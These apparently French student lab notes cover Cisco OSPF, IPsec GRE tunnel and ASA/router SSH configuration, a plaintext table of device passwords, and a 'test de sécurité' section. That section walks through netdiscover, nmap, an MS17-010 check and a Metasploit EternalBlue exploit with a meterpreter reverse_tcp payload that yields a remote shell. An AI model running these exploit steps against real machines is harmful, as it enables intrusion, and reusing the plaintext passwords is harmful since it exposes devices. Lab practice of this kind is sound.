router ospf 1 log-adjacency-changes network 134.0.0.0 0.255.255.255 area 0 network 172.16.1.0 0.0.0.3 area 0 network 192.168.51.0 0.0.0.255 area 0

Mise en place du cryptage :

crypto isakmp policy 10 encr aes authentication pre-share group 2

crypto isakmp key MON\_SECRET address 139.0.0.1

crypto ipsec transform-set TRANS\_1 esp-aes esp-sha-hmac

crypto map CRYPTO-MAP 10 ipsec-isakmp set peer 139.0.0.1 set transform-set TRANS\_1 match address 100

#### Mise en place du Tunnel IPsec :

interface TunnelO ip address 172.16.1.2 255.255.255.252 mtu 1476 tunnel source GigabitEthernetO/1 tunnel destination 139.0.0.1

ip route 192.168.50.0 255.255.255.0 172.16.1.1 ip route 192.168.30.0 255.255.255.0 172.16.1.1 ip route 192.168.1.0 255.255.255.0 172.16.1.1

access-list 100 permit gre host 134.0.0.1 host 139.0.0.1

# Liste mot de passe :

| Equipement        | Mot de passe    |
|-------------------|-----------------|
| I3_siege          | L3/siege        |
| ASA_siege         | Asa/siege1      |
| L2_siege          | L2/siege        |
| router siege      | R1/siege        |
| I3_succursale     | L3/succursale   |
| ASA_succursale    | Asa/succursale2 |
| l2_succursale     | L2/succursale   |
| router_succursale | R1/succursale   |
| router haut       | R1/haut         |

# **Configuration sur les ASA :**

enable password Asa/succursale2

hostname ASA-SIEGE

domain-name asa\_succursale.com

crypto key generate rsa modulus 2048

username admin password Asa/succursale2

aaa authentication ssh console LOCAL

ssh version 2 ssh timeout 10 ssh 0.0.0.0 0.0.0.0 inside password encryption aes service password-encryption

# Configuration sur les autres équipements :

enable secret R1/haut line console O password R1/haut login exit line vty O 4 password R1/haut login exit ip domain-name R1\_haut.com crypto key generate rsa

prendre 2048 pour la crypto key generate rsa

username admin secret R1/haut line vty O 4 transport input ssh login local ip ssh version 2

service password-encryption

# <u>ANSII :</u>

https://docs.google.com/spreadsheets/d/1rqr-647tx gtyKY36QbCVSP5V3fuM0nbu/edit?usp=sharing& ouid=110355535778391124595&rtpof=true&sd=tru e

# <u>Test de sécurité</u>

## <u> Découverte du réseau :</u>

pour découvrir la machine à attaquer, on tape :

• netdiscover

on trouve donc la machine a attaquer avec l'IP : 192.168.0.27

on va donc commencer par scanner les ports ouverts :

• nmap -sS -A 192.168.0.27

# **Exploitation des failles :**

On voit qu'il y a un service SMBv1 on va donc d'abord essayer de s'y connecter à l'aide d'un client windows, puis on essayera d'exploiter la faille Eternal Blue.

on repère qu'on peut se connecter en mode anonyme sur le serveur Samba et qu'on a tout les droits; on va aussi essayer la faille Eternal Blue :

on effectue donc un scan pour voir si la faille peut être exploiter :

• nmap -p 445 --script smb-vuln-ms17-010 192.168.0.27

on voit que la faille est vulnérable, on va donc l'exploiter :

- msfconsole
- use exploit/windows/smb/ms17\_010\_eternalblue
- set RHOSTS 192.168.0.27
- set RPORT 445
- set PAYLOAD windows/x64/meterpreter/reverse\_tcp
- set LPORT 4444
- exploit
- shell

On a donc maintenant un reverse shell, on peut donc taper les commandes que l'on veut sur le serveur.

# **Tunnel sécurisé IPsec GRE**

# <u>1. Fonctionnement de base</u>

Le tunnel IPsec GRE (Generic Routing Encapsulation) combine les fonctionnalités de GRE et IPsec afin d'assurer un tunnel sécurisé qui permet de transporter des paquets de différents protocoles de couche réseau.

- **GRE** encapsule les paquets IP originaux dans un nouveau paquet IP en ajoutant une entête GRE.
- **IPsec** chiffre et authentifie ces paquets GRE, assurant la confidentialité, l'intégrité et l'authenticité.

# 2. Encapsulation des trames

Voici le processus détaillé de l'encapsulation :

- **Paquet original**: [Entête IP original | Données]
- Encapsulation GRE: [Nouvel entête IP externe | Entête GRE | Entête IP original | Données]
- Encapsulation IPsec ESP (mode tunnel): [Nouvel entête IP externe | Entête ESP | [Entête GRE | Entête IP original | Données chiffrées] | ESP Trailer | ESP Auth]

## 3. Détails techniques et négociations cryptographiques

#### Échange IKE (Internet Key Exchange) :

- IKE Phase 1 (ISAKMP SA) :
  - Mode utilisé : Main Mode
  - Authentification : PSK (Pre-Shared Key) ou Certificats PKI
  - Algorithmes : AES-256 pour le chiffrement, SHA-256 pour l'intégrité, groupe Diffie-Hellman (ex : groupe 14)
- IKE Phase 2 (IPsec SA) :
  - Mode Quick Mode
  - Algorithmes : AES-GCM-256 (chiffrement authentifié recommandé) ou AES-256 avec SHA-256 pour l'intégrité
  - Négociation de la Security Association (SA) : Paramètres de chiffrement, durée de vie (ex : 3600 secondes)

# 4. Associations de sécurité (SA)

- SA IPSec :
  - Définit les clés symétriques pour le chiffrement et l'intégrité.
  - Exemple de paramètres : AES-256, SHA-256, durée de vie 3600 secondes.

#### • SA IKE :

- Gère la négociation des clés (via Diffie-Hellman)
- Renouvellement automatique des clés après expiration de la durée de vie

# 5. Gestion MTU et fragmentation

- Ajustement MTU :
  - MTU optimal recommandé : 1400 bytes (typique)
  - Utilisation du TCP MSS Clamp (ex : 1360 bytes) pour éviter fragmentation excessive.

# 6. Configuration réseau et pare-feu

- Ouverture des ports suivants sur pare-feu :
  - UDP 500 (IKE)
  - UDP 4500 (NAT-T)
  - Protocoles : ESP (50), GRE (47)